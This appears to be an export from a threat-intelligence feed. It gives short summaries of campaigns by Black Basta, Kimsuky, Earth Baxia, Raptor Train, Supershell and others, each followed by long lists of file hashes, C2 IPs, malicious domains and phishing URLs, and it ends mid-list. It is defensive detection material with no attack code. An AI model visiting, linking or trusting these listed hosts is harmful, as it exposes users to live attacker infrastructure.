148c69a7a1e06dc06e52db5c3f5895de6adc3d79498bc3ccc2cbd8fdf28b2070 |
FileHash-SHA256 |
15eee641978ac318dabc397d9c39fb4cb8e1a854883d8c2401f6f04845a79b4b |
FileHash-SHA256 |
1ad43ddfce147c1ec71b37011d522c11999a974811fead11fee6761ceb920b10 |
FileHash-SHA256 |
27202534cc03a398308475146f6710b790aa31361931d4fe1b495c31c3ed54f7 |
FileHash-SHA256 |
293b1a7e923be0f554ec44c87c0981c9b5cf0f20c3ad89d767f366afb0c1f24a |
FileHash-SHA256 |
2b35ef3080dcc13e2d907f681443f3fc3eda832ae66b0458ca5c97050f849306 |
FileHash-SHA256 |
3e39fc595db9db1706828b0791161440dc1571eaa07b523df9b721ad65e2369b |
FileHash-SHA256 |
4108c5096a62c0a6664eed781c39bb042eb0adf166fcc5d64d7c89139d525d4f |
FileHash-SHA256 |
41d4f7734fbf14ebcdf63f51093718fd5a22ec38a297c0dc3d7704a3fb48b3f9 |
FileHash-SHA256 |
44e492d5b9c48c1df7ef5e0fe9a732f271234219d8377cf909a431a386759555 |
FileHash-SHA256 |
458641936e2b41c425161a9b892d2aa08d1de2bc0db446f214b5f87a6a506432 |
FileHash-SHA256 |
4599a9421e83fb0e2c005e5d9ac171305192beabe965f3385accaf2647be3e8e |
FileHash-SHA256 |
58fdc1b6ce4744d6331f8e2efc4652d754e803cae4cc16101fc78438184995e6 |
FileHash-SHA256 |
6a3839788c0dafe591718a3fb6316d12ccd8e82dbcb41ce40e66b743f2dd344d |
FileHash-SHA256 |
6bf8a19deb443bde013678f3ff83ab9db4ddc47838cd9d00935888e00b30cee6 |
FileHash-SHA256 |
72a25d959d12e3efe9604aee4b1e7e4db1ef590848d207007419838ddbad5e3f |
FileHash-SHA256 |
8a4fbcdec5c08e6324e3142f8b8c41da5b8e714b9398c425c47189f17a51d07b |
FileHash-SHA256 |
97ba8d30cf8393c39f61f7e63266914ecafd07bd49911370afb866399446f37d |
FileHash-SHA256 |
a80a35649f638049244a06dd4fb6eca4de0757ef566bfbe1affe1c8bf1d96b04 |
FileHash-SHA256 |
b8233fe9e903ca08b9b1836fe6197e7d3e98e36b13815d8662de09832367a98a |
FileHash-SHA256 |
f4aa4c6942a87087530494cba770a1dcbc263514d874f12ba93a64b1edbae21c |
FileHash-SHA256 |
f928a0887cf3319a74c90c0bdf63b5f79710e9f9e2f769038ec9969fcc8ee329 |
FileHash-SHA256 |
facf3b40a2b99cc15eee7b7aee3b36a57f0951cda45931fcde311c0cc21cdc71 |
domain |
nmailhostserver.store |
domain |
nsonlines.store |
domain |
pumaria.store |
domain |
yoiroyse.store |
|
Russia-linked crypto threat actor involved in political spoofing tracked |
A Russia-linked threat actor is deploying domains for crypto scams targeting the US Presidential Election and prominent tech brands. The scams involve fake Bitcoin and Ethereum giveaways, asking users to send coins to attacker-controlled wallets with false promises of doubling returns. A large cluster of domains featuring US political figures, business leaders, and global brands has been discovered, using counterfeit legal letters from US agencies to add legitimacy. Targets include Donald Trump, Kamala Harris, Tim Cook, Elon Musk, and others. The campaign involves spoofed websites, CAPTCHA protection, and chat functions. Some domains feature Russian language content. The threat actor uses Cloudflare for hosting and has registered domains with a Russian email address. |
Type |
Indicator |
domain |
apple-event2024.com |
domain |
btcstarship.com |
domain |
cryptologic.online |
domain |
debate.gives |
domain |
trumpdebate24.com |
hostname |
musk.trump.io |
|
Derailing the Raptor Train |
A large, multi-tiered botnet called Raptor Train, likely operated by Chinese threat actors Flax Typhoon, has been discovered. Consisting of over 60,000 compromised SOHO and IoT devices at its peak, it's one of the largest Chinese state-sponsored IoT botnets to date. The botnet uses a sophisticated control system called Sparrow to manage its infrastructure and execute various tasks. While no DDoS attacks have been observed, the botnet has targeted U.S. and Taiwanese entities in sectors like military, government, education, and telecommunications. The network architecture includes three tiers: compromised devices, exploitation and C2 servers, and management nodes. Campaigns have evolved over four years, showing increasing sophistication in tactics and scale. |
Type |
Indicator |
CVE |
CVE-2024-21887 |
IPv4 |
45.92.70.111 |
IPv4 |
45.92.70.112 |
IPv4 |
45.92.70.113 |
IPv4 |
45.92.70.115 |
IPv4 |
45.92.70.68 |
IPv4 |
45.92.70.71 |
IPv4 |
185.207.154.253 |
IPv4 |
23.236.68.161 |
IPv4 |
23.236.69.110 |
IPv4 |
23.236.69.82 |
IPv4 |
45.10.58.133 |
IPv4 |
45.13.199.104 |
IPv4 |
45.13.199.152 |
IPv4 |
45.13.199.45 |
IPv4 |
45.80.215.149 |
IPv4 |
5.188.33.228 |
IPv4 |
65.20.97.251 |
IPv4 |
85.90.216.110 |
IPv4 |
92.38.178.232 |
IPv4 |
92.38.185.45 |
FileHash-SHA256 |
2aa12e5989065951be84ce932b65bd197dd6be3fa987838bad48536c0c74d145 |
FileHash-SHA256 |
546390a3a296154e36051dda745b573658311f9831789bb1faca411a3803a9bb |
FileHash-SHA256 |
c6fe1748e68923f278926ee8679aaee22800b9c93c38641d12ea0e945e116bb0 |
IPv4 |
104.244.89.157 |
IPv4 |
114.255.70.20 |
IPv4 |
114.255.70.30 |
IPv4 |
139.180.137.219 |
IPv4 |
14.1.98.223 |
IPv4 |
149.248.51.22 |
IPv4 |
155.138.133.56 |
IPv4 |
155.138.151.225 |
IPv4 |
185.14.45.160 |
IPv4 |
195.234.62.18 |
IPv4 |
195.234.62.184 |
IPv4 |
195.234.62.188 |
IPv4 |
195.234.62.19 |
IPv4 |
195.234.62.192 |
IPv4 |
195.234.62.197 |
IPv4 |
195.234.62.198 |
IPv4 |
202.182.109.151 |
IPv4 |
207.148.122.69 |
IPv4 |
207.148.68.131 |
IPv4 |
210.61.186.117 |
IPv4 |
223.98.159.112 |
IPv4 |
23.236.68.193 |
IPv4 |
23.236.68.213 |
IPv4 |
23.236.68.229 |
IPv4 |
37.61.229.15 |
IPv4 |
37.61.229.17 |
IPv4 |
37.9.35.89 |
IPv4 |
45.10.58.128 |
IPv4 |
45.10.58.129 |
IPv4 |
45.10.58.130 |
IPv4 |
45.10.58.132 |
IPv4 |
45.13.199.140 |
IPv4 |
45.13.199.207 |
IPv4 |
45.13.199.84 |
IPv4 |
45.13.199.96 |
IPv4 |
45.135.117.131 |
IPv4 |
45.135.117.136 |
IPv4 |
45.77.231.209 |
IPv4 |
45.80.215.150 |
IPv4 |
45.80.215.151 |
IPv4 |
45.80.215.152 |
IPv4 |
45.80.215.154 |
IPv4 |
45.80.215.155 |
IPv4 |
45.80.215.156 |
IPv4 |
45.80.215.186 |
IPv4 |
45.80.215.47 |
IPv4 |
5.181.27.19 |
IPv4 |
5.181.27.21 |
IPv4 |
5.181.27.219 |
IPv4 |
5.181.27.6 |
IPv4 |
5.188.33.135 |
IPv4 |
5.45.184.68 |
IPv4 |
78.141.238.97 |
IPv4 |
85.90.216.111 |
IPv4 |
85.90.216.112 |
IPv4 |
85.90.216.115 |
IPv4 |
85.90.216.116 |
IPv4 |
85.90.216.69 |
IPv4 |
89.44.198.195 |
IPv4 |
89.44.198.200 |
IPv4 |
89.44.198.254 |
IPv4 |
91.216.190.154 |
IPv4 |
91.216.190.2 |
IPv4 |
91.216.190.247 |
IPv4 |
91.216.190.74 |
IPv4 |
91.216.190.80 |
IPv4 |
92.223.30.232 |
IPv4 |
92.223.30.233 |
IPv4 |
92.223.30.241 |
IPv4 |
92.38.135.146 |
IPv4 |
92.38.176.131 |
IPv4 |
92.38.176.156 |
IPv4 |
92.38.185.43 |
IPv4 |
92.38.185.44 |
IPv4 |
92.38.185.46 |
IPv4 |
92.38.185.47 |
domain |
adjsn.com |
domain |
amdord.com |
domain |
aqakffj.com |
domain |
bcdkwwuah.com |
domain |
bkhqwfhtu.com |
domain |
blepmhnay.com |
domain |
bxgtbv.com |
domain |
clqqknzb.com |
domain |
cvgeuwo.com |
domain |
cvmnomvxm.com |
domain |
dkuwbcen.com |
domain |
dvujvkfu.com |
domain |
ecvkiehs.com |
domain |
eufcj.com |
domain |
fajxtg.com |
domain |
ftcexq.com |
domain |
glxxet.com |
domain |
gmhrxhc.com |
domain |
grntjr.com |
domain |
hersrr.com |
domain |
hfsdln.com |
domain |
hy1025.com |
domain |
hy229.com |
domain |
hy30.com |
domain |
hy324.com |
domain |
hy42.com |
domain |
hy424.com |
domain |
hy529.com |
domain |
hy619.com |
domain |
hy811.com |
domain |
hy830.com |
domain |
hy92.com |
domain |
hyddh.com |
domain |
iycwqot.com |
domain |
jgnsqihc.com |
domain |
jkwxcc.com |
domain |
kmgzbowwg.com |
domain |
lfzupr.com |
domain |
lofeuq.com |
domain |
lomuzs.com |
domain |
lznmihdej.com |
domain |
mudvw.com |
domain |
mvxnspcqr.com |
domain |
nhcmdikkd.com |
domain |
nmfagp.com |
domain |
obqlibg.com |
domain |
oicdsgjxz.com |
domain |
omviak.com |
domain |
oploz.com |
domain |
osiso.com |
domain |
qjknpv.com |
domain |
qsxgzu.com |
domain |
rnjca.com |
domain |
saoadlg.com |
domain |
sbuybjv.com |
domain |
sreudcnb.com |
domain |
ttcyci.com |
domain |
tvcvhzyk.com |
domain |
ujrtkw.com |
domain |
vbbrfvhrg.com |
domain |
vgbgwzmr.com |
domain |
wndaoyk.com |
domain |
woaba.com |
domain |
wvsezu.com |
domain |
ykcmewapc.com |
domain |
ysubryfv.com |
domain |
zuszr.com |
hostname |
aewreiuicajo.w8510.com |
hostname |
apdfhhjcxcb.w8510.com |
hostname |
api.k3121.com |
hostname |
awbpxtpi.w8510.com |
hostname |
awerdasvbjgrt.b2047.com |
hostname |
awqx.k3121.com |
hostname |
axqw.k3121.com |
hostname |
ayln.b2047.com |
hostname |
bzbatflwb.w8510.com |
hostname |
firc.b2047.com |
hostname |
hnai.k3121.com |
hostname |
hume.b2047.com |
hostname |
hyjk.k3121.com |
hostname |
kliscjaisdjhi.w8510.com |
hostname |
kuyw.b2047.com |
hostname |
lfdx.k3121.com |
hostname |
lyblqwesfawe.w8510.com |
hostname |
mail.k3121.com |
hostname |
mjiudwajhkf.w8510.com |
hostname |
nulp.k3121.com |
hostname |
ocmnusdjdik.w8510.com |
hostname |
oklm.k3121.com |
hostname |
qwsd.k3121.com |
hostname |
tuisasdcxzd.w8510.com |
hostname |
voias.b2047.com |
hostname |
wmllxwkg.w8510.com |
hostname |
xaqw.k3121.com |
hostname |
xbqw.k3121.com |
hostname |
xxqw.b2047.com |
hostname |
zasdfgasd.w8510.com |
hostname |
zdacasdc.w8510.com |
hostname |
zdacxzd.w8510.com |
|
Kimsuky: A Gift That Keeps on Giving |
This analysis details a sophisticated cyber attack attributed to the North Korean-linked Kimsuky APT group. The attack begins with an LNK file, leading to the execution of obfuscated VBS scripts. These scripts create scheduled tasks, modify registry keys for persistence, and establish communication with a command and control (C2) server. The malware employs various evasion techniques, including Base64 encoding and Caesar Cipher obfuscation. The ultimate goal appears to be maintaining long-term access to the victim's machine for espionage activities. The report also includes a personal anecdote of the analyst's brief interaction with the C2 server, receiving a single command after hours of waiting. |
Type |
Indicator |
FileHash-MD5 |
0c3fd7f45688d5ddb9f0107877ce2fbd |
FileHash-MD5 |
37fb639a295daa760c739bc21c553406 |
FileHash-MD5 |
4cbafb288263fe76f5e36f1f042be22d |
FileHash-MD5 |
622358469e5e24114dd0eb03da815576 |
FileHash-MD5 |
73ed9b012785dc3b3ee33aa52700cfe4 |
FileHash-SHA1 |
50e4d8a112e4aad2c984d22f83c80c8723f232da |
FileHash-SHA256 |
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229 |
IPv4 |
64.49.14.181 |
|
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC |
Earth Baxia, a suspected China-based threat actor, targeted government organizations, telecommunication businesses, and the energy industry in multiple Asia-Pacific countries. The group employed sophisticated techniques, including spear-phishing emails and exploitation of a GeoServer vulnerability (CVE-2024-36401). They deployed customized Cobalt Strike components and a new backdoor called EAGLEDOOR on compromised machines. EAGLEDOOR supports multiple communication protocols for information gathering and payload delivery. The attackers used public cloud services to host malicious files, making tracking difficult. They also utilized techniques like GrimResource and AppDomainManager injection to deploy additional payloads. The campaign affected countries including Taiwan, Philippines, South Korea, Vietnam, Thailand, and potentially China. |
Type |
Indicator |
IPv4 |
167.172.89.142 |
CVE |
CVE-2024-36401 |
IPv4 |
152.42.243.170 |
IPv4 |
167.172.84.142 |
IPv4 |
188.166.252.85 |
hostname |
static.krislab.site |
IPv4 |
167.172.89.142 |
FileHash-MD5 |
249c2d77aa53c36b619bdfbf02a817e5 |
FileHash-MD5 |
55689e6075629b68798c1feb2d168516 |
FileHash-MD5 |
9bbb096a052ad6e4055b39f2c9216026 |
FileHash-MD5 |
9f376a334f9362c6c316a56e2ffd4971 |
FileHash-MD5 |
e51f2ea5a877e3638457e01bf46a20e1 |
FileHash-SHA1 |
9833566856f924e4a60e4dd6a06bf9859061f4be |
FileHash-SHA1 |
d9b814f53e82f686d84647b7d390804b331f1583 |
FileHash-SHA1 |
dce0a4c008ea7c02d768bc7fd5a910e79781f925 |
FileHash-SHA1 |
e2b0c45beadff54771a0ad581670a10e76dc4cf1 |
FileHash-SHA256 |
04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e |
FileHash-SHA256 |
061bcd5b34c7412c46a3acd100167336685a467d2cbcd1c67d183b90d0bf8de7 |
FileHash-SHA256 |
1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee |
FileHash-SHA256 |
1c26d79a841fdca70e50af712f4072fea2de7faf5875390a2ad6d29a43480458 |
FileHash-SHA256 |
1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448 |
FileHash-SHA256 |
4ad078a52abeced860ceb28ae99dda47424d362a90e1101d45c43e8e35dfd325 |
FileHash-SHA256 |
4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54 |
FileHash-SHA256 |
6be4dd9af27712f5ef6dc7d684e5ea07fa675b8cbed3094612a6696a40c664ce |
FileHash-SHA256 |
916f3f4b895c8948b504cbf1beccb601ff7cc6e982d2ed375447bce6ecb41534 |
FileHash-SHA256 |
9b50e888aaec0e4d105a6f06db168a8a2dcf9ab1f9deeff4b7862463299ab1ca |
FileHash-SHA256 |
b3b8efcaf6b9491c00049292cdff8f53772438fde968073e73d767d51218d189 |
FileHash-SHA256 |
c78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc |
FileHash-SHA256 |
cef0d2834613a3da4befa2f56ef91afc9ab82b1e6c510d2a619ed0c1364032b8 |
FileHash-SHA256 |
d23dd576f7a44df0d44fca6652897e4de751fdb0becc6b14b754ac9aafc9081c |
FileHash-SHA256 |
d3c1ada67f9fe46dfb11f72c1754667d2ccd0026d48d37b61192e3d0ef369b84 |
FileHash-SHA256 |
e9854ab68dad0a744925118bfae4ec6ce9c4b7727e2ad6763aa50b923991de95 |
IPv4 |
152.42.243.170 |
IPv4 |
167.172.84.142 |
IPv4 |
188.166.252.85 |
domain |
visualstudio-microsoft.com |
hostname |
api.s2cloud-amazon.com |
hostname |
ms1.hinet.lat |
hostname |
msa.hinet.ink |
hostname |
rocean.oca.pics |
hostname |
static.krislab.site |
hostname |
static.trendmicrotech.com |
hostname |
status.s3cloud-azure.com |
hostname |
us2.s3bucket-azure.online |
|
Supershell Malware Being Distributed to Linux SSH Servers |
A Chinese-developed Go-based backdoor called Supershell is targeting poorly managed Linux SSH servers. The malware, which supports multiple platforms, primarily functions as a reverse shell for remote system control. Attackers use dictionary attacks from various IP addresses to gain access, then install Supershell directly or via a downloader script. The malware is downloaded from web and FTP servers. While Supershell is the initial payload for control hijacking, XMRig Monero CoinMiners are often installed alongside it, suggesting cryptocurrency mining as the ultimate goal. To protect against such attacks, administrators should use strong passwords, update systems regularly, and implement security measures like firewalls. |
Type |
Indicator |
IPv4 |
107.189.8.15 |
FileHash-MD5 |
4ee4f1e7456bb2b3d13e93797b9efbd3 |
FileHash-MD5 |
5ab6e938028e6e9766aa7574928eb062 |
FileHash-MD5 |
e06a1ba2f45ba46b892bef017113af09 |
FileHash-SHA1 |
4b76040b0d4e2651f0c0a781c336ddebf8b8c057 |
FileHash-SHA1 |
a65ff070743b2bf15717e551b4be4e788fb25c08 |
FileHash-SHA1 |
c4e0241a4276cb15c95b52c673328de8abcf04b4 |
FileHash-SHA256 |
157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff |
FileHash-SHA256 |
23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa |
FileHash-SHA256 |
cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15 |
IPv4 |
45.15.143.197 |
|
Unicorn: New Spy Scripts Steal Data from Russian Companies |
A new malware campaign targeting Russian energy companies, factories, and electronic component suppliers has been detected. The malware, distributed via email attachments or Yandex Disk links, uses RAR archives containing LNK files to download and execute malicious HTA files. These files create VBS scripts that establish persistence through registry keys and scheduled tasks. The scripts copy files from the user's home directory and Telegram data, then exfiltrate them to the attacker's server. Unlike typical attacks, this malware remains active, continuously stealing new and modified files. The campaign shows no clear connection to known threat groups and is detected as Trojan-Spy.VBS.Unicorn. |
Type |
Indicator |
FileHash-MD5 |
54562bd71d5e0d025297b25d4cacb384 |
FileHash-MD5 |
625d30bf6f54d47611f23c514c1dd4d6 |
FileHash-MD5 |
8009657da8b46f851ff8e833169d839d |
FileHash-MD5 |
86b4781b1ad041a3696df2efb269718f |
FileHash-MD5 |
c9a941a305f68d726b1e49b965b5812d |
URL |
https://yandex-drive.petition-change.org/file_preview/commecrial_list.pdf |
URL |
https://support.petition-change.org/unicorn |
|
Black Basta Ransomware: What You Need to Know |
Black Basta is a ransomware-as-a-service group that emerged in April 2022, known for double extortion tactics. They target organizations globally, particularly in North America, Europe, and Australia, affecting over 500 entities across various industries. Initial access is gained through phishing, Qakbot, Cobalt Strike, and vulnerability exploitation. The group uses tools like Mimikatz for credential theft and lateral movement. Their process involves data exfiltration using Rclone, followed by file encryption using the ChaCha20 algorithm. The ransomware disables system defenses, deletes shadow copies, and leaves a ransom note. Black Basta has been linked to the FIN7 threat actor due to similarities in EDR evasion techniques. |
Type |
Indicator |
FileHash-MD5 |
229ec577744224d4d2fb2091ac253dd8 |
FileHash-SHA1 |
497013697aba845b400d23bd774cf2ad09f4dae5 |
FileHash-SHA256 |
42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 |
CVE |
CVE-2020-1472 |
CVE |
CVE-2021-34527 |
CVE |
CVE-2021-42278 |
CVE |
CVE-2021-42287 |
CVE |
CVE-2024-1709 |
CVE |
CVE-2024-26169 |
FileHash-MD5 |
00da1d47bc0d09a01121553fa2693f26 |
FileHash-MD5 |
0165ff14fa840c0074a7ee5108858f8d |
FileHash-MD5 |
0bf7bc20496143a9f028e77ab47b4698 |
FileHash-MD5 |
1ce3b67e179c8420bd5b31e75b4427ca |
FileHash-MD5 |
24544104aaa9931b8cc0c68622864488 |
FileHash-MD5 |
2a255e75f72ac142689082437a866c32 |
FileHash-MD5 |
2b7fc9dd400d92cc64627115b47a592f |
FileHash-MD5 |
2c383f6fa25eea59fc54e5af19861fba |
FileHash-MD5 |
2d5cefe02cef5d14da7d609f0ccad1bc |
FileHash-MD5 |
2f90cd68e4a92c5151c6e43902397a13 |
FileHash-MD5 |
3f400f30415941348af21d515a2fc6a3 |
FileHash-MD5 |
403dee0dd3891459b22a8a37828b66b8 |
FileHash-MD5 |
470c803b32209fbeb09af80a1b83e6f2 |
FileHash-MD5 |
497ef4779c6770e4497adf0bc71655f1 |
FileHash-MD5 |
4c54bec464ba0c2b9d522643e1b3ebe7 |
FileHash-MD5 |
4e8a7b03ff758f5c75ce992615a14fd0 |
FileHash-MD5 |
59db7bd22d4ec503b768ece646205c27 |
FileHash-MD5 |
5c421d53680a56650df20fd71485ca0f |
FileHash-MD5 |
640132bbf92eb7c794a5c593fbb362de |
FileHash-MD5 |
6441d7260944bcedc5958c5c8a05d16d |
FileHash-MD5 |
65e8bd5b9128574f1122527b32e1dc21 |
FileHash-MD5 |
6785c08d9b83fa5f94b9e07f3434d7ca |
FileHash-MD5 |
6a202e9a95f58938d02385e31d43ed87 |
FileHash-MD5 |
6b010dcbc9c09b06b16e6a6cc6387a7b |
FileHash-MD5 |
6d5b9675b68bac95b885b4bb294134a1 |
FileHash-MD5 |
6eb89be04f8c1823cfabd28f0f57139b |
FileHash-MD5 |
6f01787f5f644916b2dda5b4295efa4f |
FileHash-MD5 |
6f9f4b7e63692eb7dcbc0957d3e7530e |
FileHash-MD5 |
7688c1b7a1124c1cd9413f4b535b2f44 |
FileHash-MD5 |
80ab6a4d16c8137308dea1dc7922bd47 |
FileHash-MD5 |
8bae9edbf5b1035cd52ca45b23fee29d |
FileHash-MD5 |
97abffeaa7bdfaa81532bd6028498225 |
FileHash-MD5 |
9f727c56a415bf8ffa884ef241bbcd10 |
FileHash-MD5 |
a292fee8d8db83711e72c06d6f82562d |
FileHash-MD5 |
a41afe748aed818ab6ac94e81bdde610 |
FileHash-MD5 |
adb3cf03e9be744107e61bd7de4c26bd |
FileHash-MD5 |
afa27795c0c86b6afeb138d0fb09506b |
FileHash-MD5 |
b365faebaf416681b5f376c8aa4f4470 |
FileHash-MD5 |
b648b7305df49492c44a1280ec2228a0 |
FileHash-MD5 |
bc95f228b11fa3b4e91c30d98f9f3bff |
FileHash-MD5 |
c115bbbdb1a61f8c553d74802bfd78fb |
FileHash-MD5 |
cddf2c9ac528b27af98da74dcb8d6ea0 |
FileHash-MD5 |
ce99e91e6c2a6defe1a86462870ba321 |
FileHash-MD5 |
d1ae751134e04bf6188aaed148409620 |
FileHash-MD5 |
d50a3b60eb046c5d7bc6768bd3d7f1b9 |
FileHash-MD5 |
d513a09a10122ba8cd6df651aae35fb0 |
FileHash-MD5 |
dd611cf3137868795121a44518139ca4 |
FileHash-MD5 |
e4d9351749d5b713b3838ba7b1fe8060 |
FileHash-MD5 |
e52aa8e50c0ccf883b7ab7f0c36bb878 |
FileHash-MD5 |
e7d5201947829fd265a0356771fbeb63 |
FileHash-MD5 |
e83d6092439a90af2b4b1db2ad3a9c5a |
FileHash-MD5 |
eaaa577b690501adf1969b71e5636e0f |
FileHash-MD5 |
ed891e4fd173700fac93b3dda30517c9 |
FileHash-MD5 |
eff424376edca5680b90ea9fedad163d |
FileHash-MD5 |
f05dac112cd3174c385d10158b6080fb |
FileHash-MD5 |
f309d2c8a5c82367f0fd2be457055813 |
FileHash-MD5 |
f74cec233a9609461e7518dd4c90207b |
FileHash-MD5 |
ff2f71dffeb997583fd297695de8c4ae |
FileHash-SHA1 |
0110e12ae768872ea5c1b194dba50cbf74ec4d84 |
FileHash-SHA1 |
0b0699b324dfcd6fc40abe39d2eef7d95f1dd782 |
FileHash-SHA1 |
1f439569e3c1c14ea9f02235f8f45c49e2764160 |
FileHash-SHA1 |
2084ae47dcdda6161c8697e995512448facba37c |
FileHash-SHA1 |
25ce6c74a6f39289717522cad5eacdf5b9f4bae8 |
FileHash-SHA1 |
26ab576a0abf7085ecf6321a311a7b3088ee48ae |
FileHash-SHA1 |
328a8793323f11c1d0c5f3ddedf4ae10caafb063 |
FileHash-SHA1 |
3c13c1e54d2d7991c1c3452ae89888a8e7a47763 |
FileHash-SHA1 |
4090622f0eadc1b420aa5d55e31ca5cd45e05f12 |
FileHash-SHA1 |
46257982840493eca90e051ff1749e7040895584 |
FileHash-SHA1 |
47dacafb5dace4c5fea931e9a7392f76fdde3e98 |
FileHash-SHA1 |
4da6fef533b37a12ed1e357df66802de29c1ab5c |
FileHash-SHA1 |
530f9163be551b7488650542de31cdfd11307d63 |
FileHash-SHA1 |
53628c7a155ccb7af1135140083939018d3587f1 |
FileHash-SHA1 |
5644a0282ac420c46d3b43fbb409eb9f7842b3af |
FileHash-SHA1 |
579b245a6609903d804f957083b9e0b2ed145f5a |
FileHash-SHA1 |
591d363928f0d5f4629196d60fd899469267da09 |
FileHash-SHA1 |
6c90b89aad04f38c584fcee1d47fed9cd79f8ef1 |
FileHash-SHA1 |
6fe84c129f76d309032e26aba3c33ba0b64172e8 |
FileHash-SHA1 |
7131a6f16aa8534a9cec7e11e37423aea4c09784 |
FileHash-SHA1 |
74dbf463be3139a28d9851b3b80c2ecac3e56304 |
FileHash-SHA1 |
757932f6038b71c5dbc380a2f28b077b41fbce9b |
FileHash-SHA1 |
79054b409cb1c7a36aafd9a9915f948e2f018734 |
FileHash-SHA1 |
796531afd0e828f451786c485f95c4c04084f461 |
FileHash-SHA1 |
7a33162908cba6678dc75d688da1f86b54849782 |
FileHash-SHA1 |
80a973c3da41c6479cc9d7036090adc1264c02a4 |
FileHash-SHA1 |
82f88c1af036181ee4e92a2f9338c152d1ff0c58 |
FileHash-SHA1 |
8bf65a11e42b5850e1a5f28513dae1ffc168730e |
FileHash-SHA1 |
8ccac360e2ca37b2fa9f5fa81b22114fb8936120 |
FileHash-SHA1 |
8e714d9fdbc27d2aa9abdadc728c219623b1e573 |
FileHash-SHA1 |
9171f38c2a3115c3b21aba939a7c55cd9e726d9b |
FileHash-SHA1 |
919c33adb648ce13ee8bd7c11bffbfd836936c00 |
FileHash-SHA1 |
92408a8233567f8b10f30f83dfcdd98effe96dca |
FileHash-SHA1 |
9468012acf6df7a0e593f41e0da8123f541277df |
FileHash-SHA1 |
9e24c4e231b93142419ac20e58dd71388f7d8ab7 |
FileHash-SHA1 |
a1a698a0bdda712905950ba6414bb1fcabdd8e84 |
FileHash-SHA1 |
a44a251e98a905adfedd46edb4541b2a92ae3a20 |
FileHash-SHA1 |
a977631006818fc5717b9fbce0609c58080a8ab2 |
FileHash-SHA1 |
aa54013aeb502b4a936331deb76a6411f1f1ade7 |
FileHash-SHA1 |
ad0e80af469165da713467b13d9a2500ee340427 |
FileHash-SHA1 |
b4c5c1e0690fdb1fc8abec8abcec8633d6d5c2bb |
FileHash-SHA1 |
bd0bf9c987288ca434221d7d81c54a47e913600a |
FileHash-SHA1 |
c419ed515b5267bb39870bdedcdd8dd8b172574c |
FileHash-SHA1 |
c69ffb5061ec42c876531f153c5b94302d6d9daf |
FileHash-SHA1 |
cc7ea6bb6787df664adb69022546c42f5f409653 |
FileHash-SHA1 |
ce77bd3224f47ae4b8a04bd4b4be91c3550de294 |
FileHash-SHA1 |
d32e44f7e04a8c84e7159ed020dcf26b6e51416e |
FileHash-SHA1 |
db497b95c79e41212577db0ba06777b62db209ff |
FileHash-SHA1 |
ddd40fb7335abc4ef736ecc12a909c6329783a05 |
FileHash-SHA1 |
e05e9cc2f28bcd17f5285a34db2894bad9ccd53a |
FileHash-SHA1 |
e1caf6484d899e7bb4d0c72e8bea8ff718ff073a |
FileHash-SHA1 |
ec944a8daaa706ff5557d7fedd17bc6ba21bf96d |
FileHash-SHA1 |
f0ae322f5067b20ee89d9826dc806abdd610fb60 |
FileHash-SHA1 |
f3d31b5d4bec32a50e8a76430c801d1b8c4e6b70 |
FileHash-SHA1 |
f4553d3aa92d4c97353645451c531881e8f0991a |
FileHash-SHA1 |
f502f703f6fc65ab91d80e8d581acaffb6a93695 |
FileHash-SHA1 |
fe540dd2ba50edb2ecbef0c0180e732ff2403592 |
FileHash-SHA1 |
ff57cda4829978d8b6f7f1f31356f291b37acaa6 |
FileHash-SHA256 |
0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a |
FileHash-SHA256 |
05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 |
FileHash-SHA256 |
07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 |
FileHash-SHA256 |
09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25 |
FileHash-SHA256 |
0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e |
FileHash-SHA256 |
0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81 |
FileHash-SHA256 |
0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0 |
FileHash-SHA256 |
0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1 |
FileHash-SHA256 |
0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481 |
FileHash-SHA256 |
1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80 |
FileHash-SHA256 |
15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4 |
FileHash-SHA256 |
17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 |
FileHash-SHA256 |
17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 |
FileHash-SHA256 |
1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 |
FileHash-SHA256 |
1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250 |
FileHash-SHA256 |
1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087 |
FileHash-SHA256 |
1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e |
FileHash-SHA256 |
203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b |
FileHash-SHA256 |
21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bda |
FileHash-SHA256 |
3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 |
FileHash-SHA256 |
3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a |
FileHash-SHA256 |
